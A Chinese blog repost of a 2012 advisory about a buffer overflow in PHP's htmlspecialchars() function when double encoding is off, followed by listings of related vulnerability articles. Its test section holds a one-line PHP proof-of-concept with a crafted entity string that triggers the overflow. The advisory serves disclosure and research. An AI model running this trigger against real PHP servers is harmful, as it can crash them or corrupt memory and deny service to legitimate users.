PHP “htmlspecialchars()”缓冲区溢出漏洞

最新推荐文章于 2022-09-14 03:28:38 发布
最新推荐文章于 2022-09-14 03:28:38 发布
阅读量1.1k 收藏
点赞数
分类专栏: 其他
PHP “htmlspecialchars()”缓冲区溢出漏洞


 


  


 
发布日期:2012-02-03
更新日期:2012-02-06


受影响系统:
PHP PHP
描述:
--------------------------------------------------------------------------------
BUGTRAQ  ID: 51860


PHP是一种在电脑上运行的脚本语言,主要用途是在于处理动态网页,包含了命令行运行接口或者产生图形用户界面程序。


PHP在带有$double=false的htmlspecialchars()函数的实现上存在缓冲区溢出漏洞,因为起始位置仅允许40个字节,攻击者可利用此漏洞在PHP进程中执行任意代码,使Web Server崩溃,拒绝服务合法用户。


<*来源:cataphract
  
  链接:https://bugs.php.net/bug.php?id=60965
*>


测试方法:
--------------------------------------------------------------------------------
警 告


以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!


<?php
echo
htmlspecialchars('"""""""""""""""""""""""""""""""""""""""""""""&#x000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000005;',
ENT_QUOTES, 'UTF-8', false), "\n";


建议:
--------------------------------------------------------------------------------
厂商补丁:


PHP
---
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
zhangfeng1133
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
php htmlspecialchars加强版
10-29
加强版htmlspecialchars
PHP htmlspecialchars() 函数实例代码及用法大全
10-18
`PHP htmlspecialchars()` 函数是一个非常重要的工具,用于在输出数据到HTML页面时防止跨站脚本(XSS)攻击。这个函数的主要作用是将特定的字符转换为HTML实体,确保它们在浏览器中显示为文本,而不会被解释为HTML或...
php crypt函数缓冲区溢出漏洞,简单缓冲区溢出漏洞攻击实验
weixin_39568597的博客
03-24 419
缓冲区溢出是指程序试图向缓冲区写入超出预分配固定长度数据的情况。这一漏洞可以被恶意用户利用来改变程序的流控制,甚至执行代码的任意片段。这一漏洞的出现是由于数据缓冲器和返回地址的暂时关闭,溢出会引起返回地址被重写。实验准备之前一直听说缓冲区溢出攻击,具体是什么,怎么回事。一直没有学习过。正好今天有时间。一边学习一边写下此文。本次实验只是想体会了解一下缓冲区溢出攻击,复现一次简单的提权过程。没有较为深...
kali+php+缓冲区溢出,kali linux之edb--CrossFire缓冲区溢出
weixin_30880565的博客
04-13 392
漏洞的罪恶根源------变量,数据与代码边界不清,开发人员对用户输入没做过滤,或者过滤不严如这个脚本,写什么,显示什么,但是加上;,|,&&,后面加上系统命令,就执行命令了缓冲区溢出:当边界限制不严格时,由于变量传入畸形数据或程序运行错误,导致缓冲区被撑爆,从而覆盖了相邻内存区域的数据,成功修改i内存数据,可造成进程劫持,执行恶意代码,获取服务器控制权等后果如何发现漏洞?源码审计...
PHP5.5.9整数溢出漏洞
qq_53099802的博客
05-26 2494
php5.5.9整数溢出漏洞
php缓冲区溢出漏洞,CVE-2016-5114
weixin_36480510的博客
03-19 898
PHP(PHP:Hypertext Preprocessor,PHP:超文本预处理器)是PHP Group和开放源代码社区共同维护的一种开源的通用计算机脚本语言。该语言主要用于Web开发,支持多种数据库及操作系统。 PHP中的sapi/fpm/fpm/fpm_log.c文件中存在安全漏洞,该漏洞源于程序没有正确处理snprintf函数的返回值。攻击者可借助较长的字符串利用该漏洞获取进程内存中的敏感...
【教程】一些服务器常见漏洞的修复方法,亲测超详细
热门推荐
xfxuezhang.cn
09-14 2万+
一些常见的漏洞修复
PHP关于htmlspecialchars、strip_tags、addslashes的解释
10-25
主要介绍了PHP关于htmlspecialchars、strip_tags、addslashes的解释,需要的朋友可以参考下
php过滤输入操作之htmlentities与htmlspecialchars用法分析
10-20
主要介绍了php过滤输入操作之htmlentities与htmlspecialchars用法,结合实例形式分析了php数据过滤操作的相关函数与使用技巧,需要的朋友可以参考下
php htmlspecialchars()与shtmlspecialchars()函数的深入分析
10-27
本篇文章是对php中的htmlspecialchars()与shtmlspecialchars() 函数进行了详细的分析介绍,需要的朋友参考下
PHP5.0 TIDY_PARSE_FILE缓冲区溢出漏洞的解决方案
12-19
漏洞说明 不得不再次吐槽一下exploit-db对exp审核的质量,这个exp仍然不能触发漏洞,修改第一个参数则可以触发,我给出的poc是一个可以触发php漏洞的,问题出现在php_tidy.dll扩展中,对tidy_parse_file的第二个参数,也就是文件绝对路径没有进行长度控制和内容校验,导致在fopen失败后进入失败处理逻辑引发缓冲区溢出,下面对此漏洞进行详细分析。 软件下载: https://www.exploit-db.com/apps/f8fb5676b6a32f7be1c8d8d373fbc2af-php-5.0.0-Win32.zip (本地下载) PoC: <?
总结攻防溢出提权攻击的解决办法.php
12-15
总结攻防溢出提权攻击的解决办法 .php
PHP漏洞全解
07-26
PHP漏洞全解(一)-PHP网站的安全性问题 PHP漏洞全解(二)-命令注入攻击 PHP漏洞全解(三)-客户端脚本植入 PHP漏洞全解(四)-xss跨站脚本攻击 PHP漏洞全解(五)-SQL注入攻击 PHP漏洞全解(六)-跨网站请求伪造 PHP漏洞全解(七)-Session劫持 PHP漏洞全解(八)-HTTP响应拆分 PHP漏洞全解(九)-文件上传漏洞
php缓冲区溢出漏洞,PHP “socket_connect()”函数栈缓冲区溢出漏洞
weixin_29868343的博客
04-10 300
发布日期:2011-05-24更新日期:2011-05-25受影响系统:PHP PHP 5.3.x描述:--------------------------------------------------------------------------------BUGTRAQ ID: 47950CVE ID: CVE-2011-1938PHP是英文超级文本预处理语言(PHP:Hypertext...
php 缓冲区溢出,PHPhtmlspecialchars()”缓冲区溢出漏洞
weixin_33363265的博客
03-19 195
PHP quot;htmlspecialchars()quot;缓冲区溢出漏洞发布日期:2012-02-03更新日期:2012-02-06受影响系统:PHP PHP描述:--------------------------------------------------------------------------------BUGTRAQ ID: 51860PHP是一种在电脑上运行的脚本语言...
htmlspecialchars() 函数过滤XSS的问题
qlxmy的博客
03-05 1万+
htmlspecialchars()函数的功能如下: htmlspecialchars() 函数把预定义的字符转换为 HTML 实体。 预定义的字符是: & (和号)成为 &" (双引号)成为 "' (单引号)成为 '> (大于)成为 > 它的语法如下: htmlspecialchars(string,flags,character-set,double_en
php整数溢出 ctf,经典整数溢出漏洞示例 XCTF int_overflow
weixin_42516581的博客
03-26 1327
原标题:经典整数溢出漏洞示例 XCTF int_overflow 本文为看雪论坛优秀文章看雪论坛作者ID:IS信息整数溢出原理整数分为有符号和无符号两种类型,有符号数以最高位作为其符号位,即正整数最高位为1,负数为0,无符号数取值范围为非负数,常见各类型占用字节数如下: 对于unsigned short int类型的两个变量var1、var2,假定取值var1 = 1,var2 = 65537。 ...
PHP】缓冲区详解
杨森源的博客
03-27 5537
PHP缓冲区是默认开启的,它的默认参数在php.ini配置文件中,值是4096字节。在其中找到output_buffering配置参数来修改PHP缓冲区的大小。开发者也可以在脚本中通过ob_start()函数手动处理PHP缓冲区机制。这样即便输出内容超过了配置参数的大小,也不会把数据传输给浏览器,ob_start()将PHP缓冲区空间设置到足够大,只有脚本执行结束后或调用ob_end_flush()
php5.4.x缓冲区溢出,PHPphp_parserr()”缓冲区溢出漏洞
weixin_34287049的博客
03-11 174
发布日期:2014-06-16更新日期:2014-06-17受影响系统:PHP PHP 5.5.xPHP PHP 5.4.xPHP PHP 5.3.x描述:--------------------------------------------------------------------------------CVE(CAN) ID: CVE-2014-4049PHP是广泛使用的通用目的脚本语...
PHP函数整数溢出漏洞(CVE-2016-10159)漏洞怎么修复
最新发布
05-26
漏洞是由于PHP函数`htmlspecialchars()`和`htmlentities()`在处理特定参数时,未能正确处理整数溢出而导致的。攻击者可以利用该漏洞在服务器上执行任意代码或者拒绝服务。 要修复该漏洞,可以采取以下措施: 1. ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值